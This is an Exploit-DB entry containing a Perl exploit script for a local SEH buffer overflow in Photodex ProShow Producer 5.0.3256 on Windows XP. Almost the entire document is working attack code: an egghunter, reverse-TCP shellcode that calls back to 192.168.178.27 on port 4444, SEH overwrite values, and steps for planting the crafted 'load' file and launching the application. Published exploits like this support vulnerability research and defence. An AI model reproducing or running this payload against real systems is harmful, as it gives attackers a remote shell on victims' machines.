Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow

EDB-ID:

20036

CVE:



Author:

mr.pr0n

Type:

local


Platform:

Windows

Date:

2012-07-23


#######################################################################################
# Exploit Title: Photodex ProShow Producer v5.0.3256 - Local Buffer Overflow Exploit
# Date: 22/07/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://files.photodex.com/release/pspro_50_3256.exe
# Version: v5.0.3256
# Tested on: Windows XP SP3
# +-----------------------------------------------------+
# | This vulnerability was discovered and researched 	|
# | by Julien Ahrens [from Inshell]			|
# | http://www.exploit-db.com/exploits/19563/		|
# +-----------------------------------------------------+
######################################################################################

# The egghunter.
$egghunter  =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02".
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t". # <-- The 4 byte tag
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# MSF windows/shell_reverse_tcp 
# LHOST=192.168.178.27 LPORT=4444
$shellcode =
"\xb8\x78\x6f\x18\xec\xdb\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1".
"\x4f\x31\x42\x14\x83\xea\xfc\x03\x42\x10\x9a\x9a\xe4\x04\xd3".
"\x65\x15\xd5\x83\xec\xf0\xe4\x91\x8b\x71\x54\x25\xdf\xd4\x55".
"\xce\x8d\xcc\xee\xa2\x19\xe2\x47\x08\x7c\xcd\x58\xbd\x40\x81".
"\x9b\xdc\x3c\xd8\xcf\x3e\x7c\x13\x02\x3f\xb9\x4e\xed\x6d\x12".
"\x04\x5c\x81\x17\x58\x5d\xa0\xf7\xd6\xdd\xda\x72\x28\xa9\x50".
"\x7c\x79\x02\xef\x36\x61\x28\xb7\xe6\x90\xfd\xa4\xdb\xdb\x8a".
"\x1e\xaf\xdd\x5a\x6f\x50\xec\xa2\x23\x6f\xc0\x2e\x3a\xb7\xe7".
"\xd0\x49\xc3\x1b\x6c\x49\x10\x61\xaa\xdc\x85\xc1\x39\x46\x6e".
"\xf3\xee\x10\xe5\xff\x5b\x57\xa1\xe3\x5a\xb4\xd9\x18\xd6\x3b".
"\x0e\xa9\xac\x1f\x8a\xf1\x77\x3e\x8b\x5f\xd9\x3f\xcb\x38\x86".
"\xe5\x87\xab\xd3\x9f\xc5\xa3\x10\xad\xf5\x33\x3f\xa6\x86\x01".
"\xe0\x1c\x01\x2a\x69\xba\xd6\x4d\x40\x7a\x48\xb0\x6b\x7a\x40".
"\x77\x3f\x2a\xfa\x5e\x40\xa1\xfa\x5f\x95\x65\xab\xcf\x46\xc5".
"\x1b\xb0\x36\xad\x71\x3f\x68\xcd\x79\x95\x1f\xca\xee\xd6\x88".
"\x66\xf5\xbe\xca\x86\x1b\x63\x42\x60\x71\x8b\x02\x3b\xee\x32".
"\x0f\xb7\x8f\xbb\x85\x5f\x33\x29\x42\x9f\x3a\x52\xdd\xc8\x6b".
"\xa4\x14\x9c\x81\x9f\x8e\x82\x5b\x79\xe8\x06\x80\xba\xf7\x87".
"\x45\x86\xd3\x97\x93\x07\x58\xc3\x4b\x5e\x36\xbd\x2d\x08\xf8".
"\x17\xe4\xe7\x52\xff\x71\xc4\x64\x79\x7e\x01\x13\x65\xcf\xfc".
"\x62\x9a\xe0\x68\x63\xe3\x1c\x09\x8c\x3e\xa5\x39\xc7\x62\x8c".
"\xd1\x8e\xf7\x8c\xbf\x30\x22\xd2\xb9\xb2\xc6\xab\x3d\xaa\xa3".
"\xae\x7a\x6c\x58\xc3\x13\x19\x5e\x70\x13\x08";


$file		= "load"; # The "load" file 
$junk 		= "\x41" x (9844 - length("w00tw00t") - length($shellcode));
$nseh   	= "\xEB\x06\x90\x90"; # short jump 6 bytes
$seh  		= "\x73\xb0\x22\x10"; # 0x1022b073 -p/p/r- [if.dnt]
$nops  		= "\x90" x (100 - length($egghunter));
$exploit 	= $junk."w00tw00t".$shellcode.$nseh.$seh."\x90\x90\x90\x90".$egghunter.$nops;
open($File,">$file");
print $File $exploit;
close($File);
print " \n[!] The 'load' file, was created successfully (".(length $exploit)." bytes) [!]\n\n";
print "[+] Place the arbitrary 'load' file, into the application directory.\n";
print "[+] Execute the application (proshow.exe) \n";